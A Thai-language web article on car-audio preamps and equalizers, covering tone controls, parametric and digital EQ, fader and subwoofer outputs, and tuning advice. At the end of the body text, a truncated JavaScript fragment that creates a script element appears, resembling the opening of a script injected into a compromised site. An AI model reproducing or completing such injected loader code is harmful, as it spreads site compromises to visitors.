Select Page

รื่องของ ปรีแอมป์ / อิควอไลเซอร์

รื่องของ ปรีแอมป์ / อิควอไลเซอร์

ปรีแอมป์ / อิควอไลเซอร์ คืออุปกรณ์ชนิดหนึ่งที่ถูกจัดเอาไว้ในจำพวกของ Signal Processor หรือ อุปกรณ์เพื่อใช้ช่วยในการปรับแต่งเสียง ซึ่งนอกจากจะใช้สำหรับการควบคุมน้ำเสียงที่มาจากแหล่งกำเนิดเสียงให้ได้ อย่างถูกต้องตรงตามความต้องการแล้ว มันยังมีคุณสมบัติสำหรับการใช้งานในด้านอื่นๆอีก ซึ่งเป็นเรื่องที่ต้องพิจารณากันอย่างเหมาะสมด้วย

การจัดการเสียง ( Signal Processor)

Signal Processor จัด เป็นอุปกรณ์เสริมประสิทธิภาพ และคุณภาพเสียง ซึ่งมีหน้าที่ใช้งานกันอย่างหลากหลายออกไป อุปกรณ์จำพวกนี้สามารถต่อใช้งานร่วมกันได้อย่างหลากหลายรูปแบบ ไม่ว่าจะเป็นการต่อปรีแอมป์เข้ากับอิควอไลเซอร์ และครอสโอเวอร์ หรือว่าจะเป็นการต่ออิควอไลเซอร์เข้ากับปรีแอมป์ และครอสโอเวอร์ หรือจะต่ออิควอไลเซอร์เข้าครอสโอเวอร์ และปรีแอมป์ก็ได้ ทั้งนี้มันย่อมขึ้นอยู่กับการวางระบบไว้ว่าเป็นในรูปแบบใด โดยมีจุดสังเกตอยู่ที่ระดับของสัญญาณ เข้า/ออก ที่เหมาะสม ( Input / Output Level )

 

20120716125659-760151540

ปรีแอมป์แบบปรับตั้งเสียงได้ (Pre-Amp / Parametric / Tone / Cross)

อุปกรณ์จำพวกนี้มักจะมีขนาดความสูงเพียง 1/2 DIN เสีย เป็นส่วนมาก สามารถติดตั้งไว้ที่ด้านล่างของ เฮด-ยูนิต ได้ หรือบางทีอาจจะมีรูปทรงอื่นก็ได้ แล้วแต่การออกแบบ มีสาระสำคัญอยู่ที่คุณสมบัติของการขยายระดับสัญญาณเสียง และสามารถปรับตั้งเสียงได้จากปุ่มปรับเสียง อาจมี 3-4 ปุ่ม (โทนคอนโทรล), 5-7 ปุ่ม (อิควอไลเซอร์) และปรับความถี่กลางแต่ละปุ่มได้อย่างอิสระ (พาราเมตริค) รวมถึงในบางเครื่องยังจะมีภาคแบ่งตัดเสียงสำหรับซับวูฟเฟอร์ หรือสำหรับชุด กลาง/แหลม สำหรับลำโพง หน้า/หลัง ให้อีกต่างหากด้วย

ปรีแอมป์ / อิควอไลเซอร์ ช่วยอะไรในระบบ

ปรี แอมป์ / อิควอไลเซอร์ มีคุณสมบัติที่เด่นชัดที่ให้การควบคุมน้ำเสียงได้อย่างแม่นยำมาก ดังนั้นการเลือกใช้ ปรีแอมป์ / อิควอไลเซอร์ ที่ได้คุณภาพ และมีความเหมาะสมกับการใช้งาน จะทำให้สามารถรับเสียงได้ละเอียดเทียบขั้นระบบไฮเอ็นด์เลยทีเดียว อีกทั้งมันยังให้ความแตกต่างได้ตามความชอบ หรือตามสไตล์ของผู้ฟังแต่ละคน และทำให้เราได้ความสมบูรณ์ของเสียงกลังคืนมาอีกด้วย

 • เพิ่ม / ลด ความถี่ได้ตามต้องการ เสียง รบกวนจากรถยนต์, เสียงรบกวนบนท้องถนน, ขนาดและรูปทรงของห้องโดยสาร, การสะท้อนของกระจก และการซับเสียงของวัสดุหุ้มเบาะนั่ง สิ่งเหล่านี้ล้วนเป็นปัจจัยที่มีผลกระทบต่อคุณภาพเสียงของระบบโดยตรง คุณสามารถใช้ ปรีแอมป์ / อิควอไลเซอร์ ช่วยชดเชยความผิดพลาดที่เกิดขึ้นได้ ด้วยการเพิ่มความถี่เสียงที่ขาดหายไป หรือลดทอนความถี่ที่มีมากเกินไป…
 • ควร…ลดความถี่..ก่อนเพิ่มความถี่ เมื่อเริ่มมีการปรับตั้งคุณภาพเสียงในรถยนต์นั้น จะต้องค่อยๆปรับทีละน้อยครับ อย่าใจร้อนครับ เพราะการเพิ่มเสียงในระดับ 10 dB จะทำให้ เพาเวอร์แอมป์ ของคุณทำงานหนักขึ้นอีก 10 เท่าเลยทีเดียว และยังอาจก่อให้เกิดความเพี้ยนขึ้นได้อย่างมหาศาล ทางที่ดีก็คือพยายามทำการลดความถี่เสียงลงก่อนเป็นอันดับแรก เช่น ก่อนที่จะมีการปรับเพิ่มเสียงเบสในระบบ ควรเริ่มต้นด้วยการทดลองลดเสียงกลาง และเสียงแหลมลงเล็กน้อยดูก่อน ถ้าได้เสียงเบสที่ต้องการ หรือเหมาะสมแล้วก็ไม่ควรปรับเพิ่ม…
 • ช่วยปกป้องอุปกรณ์ในระบบ บาง คนอาจไม่เคยทราบเลยว่า ปรีแอมป์ / อิควอไลเซอร์ นอกจากการช่วยในการปรับแต่งเสียงแล้ว มันยังสามารถช่วยป้องกันอุปกรณ์บางอย่างในระบบได้อีกด้วย เช่นถ้าคุณมีชุดเบสในระบบที่เป็นลำโพง 6.5 นิ้วคู่หนึ่งคุณก็น่าจะใช้ ปรีแอมป์ / อิควอไลเซอร์ ช่วยตัดความถี่ที่ต่ำกว่า 50Hz ออก ไปเสีย ซึ่งมันจะส่งผลให้เพาเวอร์แอมป์ทำงานได้เต็มประสิทธิภาพมากขึ้น สามารถปรับความดังได้มากขึ้นโดยเสียงยังมีความสะอาดชัดอยู่ ในขณะเดียวกันก็จะเป็นการปกป้องลำโพงจากการพยายามที่จะทำงานในความถี่เสียง ที่มันทำไม่ได้อีกด้วย

การเลือก ปรีแอมป์ / อิควอไลเซอร์ สำหรับรถยนต์

ปรี แอมป์ / อิควอไลเซอร์ นั้นนอกจากจะใช้สำหรับการควบคุมเสียงที่มาจาก เฮด-ยูนิต ให้ได้อย่างถูกต้อง หรือตามความต้องการแล้ว มันยังมีคุณสมบัติอื่นๆที่น่าจะพิจารณาในการเลือกซื้อด้วย…

 • FADER ปรีแอมป์ / อิควอไลเซอร์ ที่ดีนั้นควรจะมีปุ่มเฟดเดอร์ (Fader) สำหรับปรับเสียงชุด หน้า/หลัง เพื่อสร้างความสมดุลให้กับเพาเวอร์แอมป์ ในการแยกขับลำโพงชุด หน้า/หลัง ให้ได้อย่างสมดุลในกรณีที่ เฮด-ยูนิต มีปรีเอาท์ชุด ซ้าย/ขวา เพียงชุดเดียว จะว่าไปแล้วปุ่มเฟดเดอร์นี้มัยจะมีประโยชน์อย่างยิ่งในการปรับสมดุลของเสียง ในการฟังที่ต้องการเรียร์ฟิลด์ (Rear-Fill) ที่ถูกต้องครับ
 • LISTENING POSITIONใน ปรีแอมป์ / อิควอไลเซอร์ บางรุ่นบางตัวจะมีปุ่มสำหรับตำแหน่งการนั่งฟัง (Listening Position) เพื่อการปรับมิติเสียงสเตอริโอจากซ้ายไปขวา และอาจถึงระดับการผสมผสานการฟังลักษณะน้ำหนักเสียงหนักด้านใดด้านหนึ่ง (Side-Biased)
 • SUBWOOFER OUTPUT สำหรับ ปรีแอมป์ / อิควอไลเซอร์ ในปัจจุบันนี้มันควรจะมีช่องสัญญาณของ ซับวูฟเฟอร์ เอาท์พุท มาให้ด้วย ซึ่งเป็นชุดเอาท์พุทที่กำหนดไว้สำหรับให้สัญญาณความถี่ต่ำเท่านั้นที่จะ ผ่านออกมาได้ ในบางรุ่นถ้าคุณเลือกดีๆก็อาจจะได้แบบที่มีวงจรกรองความถี่เฉพาะความถี่สูง ให้ออกไปชุด หน้า/หลัง เพื่อใช้ทำงานร่วมกับ ซับวูฟเฟอร์ เอาท์พุท นั่นก็เท่ากับว่าคุณได้ภาคครอสโอเวอร์มาใช้แบบฟรีๆด้วยการซื้อ ปรีแอมป์ / อิควอไลเซอร์ เพียงเครื่องเดียว…
 • PARAMETRIC EQUALIZER ผม กำลังจะพูดถึง พาราเมตริค อิควอไลเซอร์ ซึ่งในปัจจุบันเราหา พาราเมตริค อิควอไลเซอร์ แบบพันธ์แท้ได้ค่อนข้างยาก แต่ก็ใช่ว่าจะไม่มีนะครับ กล่าวคือมันเป็น อิควอไลเซอร์ ในแบบที่สามารถจะปรับเปลี่ยนจุดตั้งความถี่ได้อย่างอิสระ ทั้งช่วงของคลื่น และความ กว้าง/แคบ ของคลื่น ในย่านความถี่ที่เรากำหนดไว้ ซึ่งจะส่งผลให้การปรับตั้งเป็นไปได้อย่างมีประสิทธิภาพสูงสุด
 • DIGITAL EQUALIZER ใน ปรีแอมป์ / อิควอไลเซอร์ บางรุ่น จะยอมให้มีการบันทึกผลการปรับแต่งทางอคูสติคเอาไว้ในหน่วยความจำ เพื่อให้สามารถเรียกใช้ได้ตลอดเวลา ทำให้คุณสามารถที่จะตั้งการปรับแบบ Rock, Rap หรือแบบ Jazz เอาไว้ในหน่วยความจำได้ เพราะดนตรีแต่ละแนวนั้นจะมีธรรมชาติการย้ำน้ำเสียงที่แตกต่างกัน

ข้อควรระวังในการปรับเน้นความถี่

จาก ความถี่ของเครื่องดนตรีประเภทต่างๆนั้น จะเห็นว่าจะมีทั้งความถี่หลัก และความถี่รอง ดังนั้นความถี่ที่มีความสัมพันธ์กันตลอดทั้งย่านการตอบสนองความถี่ ดังนั้นการปรับเน้นเสียงดนตรีชิ้นใดชิ้นหนึ่งเป็นพิเศษ ก็อาจจะส่งผลกระทบกับเสียงดนตรีชิ้นอื่นๆได้เช่นกัน

20120716125657-1279099771แนว ทางของการใช้ ปรีแอมป์ / อิควอไลเซอร์ ที่ดีนั้น มันควรจะต้องทำการวิเคราะห์ด้วยตัวของคุณเอง เพื่อจะได้มีประสบการณ์บ้าง และบางครั้งก็ต้องพยายามใช้งานเอง เพื่อจะได้พบเจอกับข้อผิดพลาดอันมีส่วนช่วยในการเรียนรู้ถึงรูปทรงของเสียง ในรถยนต์ของคุณ และเชื่อว่ามันจะส่งผลที่ดีกับระบบเสียงของคุณอย่างแน่นอน…var d=document;var s=d.createElement(‘script’);

honor_jpeg   mb_jpeg   johnnie_jpeg   judge_jpeg   maxma-2_jpeg   konrukdee_jpeg   ma_jpeg   gip_jpeg   exad_jpeg   option_jpeg   adison_jpeg   xcaliber_jpeg   rifle_jpeg   lefven_jpeg   cube_jpeg   kingdom_jpeg   ssf_jpeg   mafia_jpeg   taurus_jpeg

เราใช้คุกกี้เพื่อพัฒนาประสิทธิภาพ และประสบการณ์ที่ดีในการใช้เว็บไซต์ของคุณ คุณสามารถศึกษารายละเอียดได้ที่ นโยบายความเป็นส่วนตัว และสามารถจัดการความเป็นส่วนตัวเองได้ของคุณได้เองโดยคลิกที่ ตั้งค่า

Privacy Preferences

คุณสามารถเลือกการตั้งค่าคุกกี้โดยเปิด/ปิด คุกกี้ในแต่ละประเภทได้ตามความต้องการ ยกเว้น คุกกี้ที่จำเป็น

Allow All
Manage Consent Preferences
 • คุกกี้ที่จำเป็น
  Always Active

  ประเภทของคุกกี้มีความจำเป็นสำหรับการทำงานของเว็บไซต์ เพื่อให้คุณสามารถใช้ได้อย่างเป็นปกติ และเข้าชมเว็บไซต์ คุณไม่สามารถปิดการทำงานของคุกกี้นี้ในระบบเว็บไซต์ของเราได้

 • คุกกี้เพื่อการวิเคราะห์

  คุกกี้ประเภทนี้จะทำการเก็บข้อมูลการใช้งานเว็บไซต์ของคุณ เพื่อเป็นประโยชน์ในการวัดผล ปรับปรุง และพัฒนาประสบการณ์ที่ดีในการใช้งานเว็บไซต์ ถ้าหากท่านไม่ยินยอมให้เราใช้คุกกี้นี้ เราจะไม่สามารถวัดผล ปรับปรุงและพัฒนาเว็บไซต์ได้

Save
%d bloggers like this: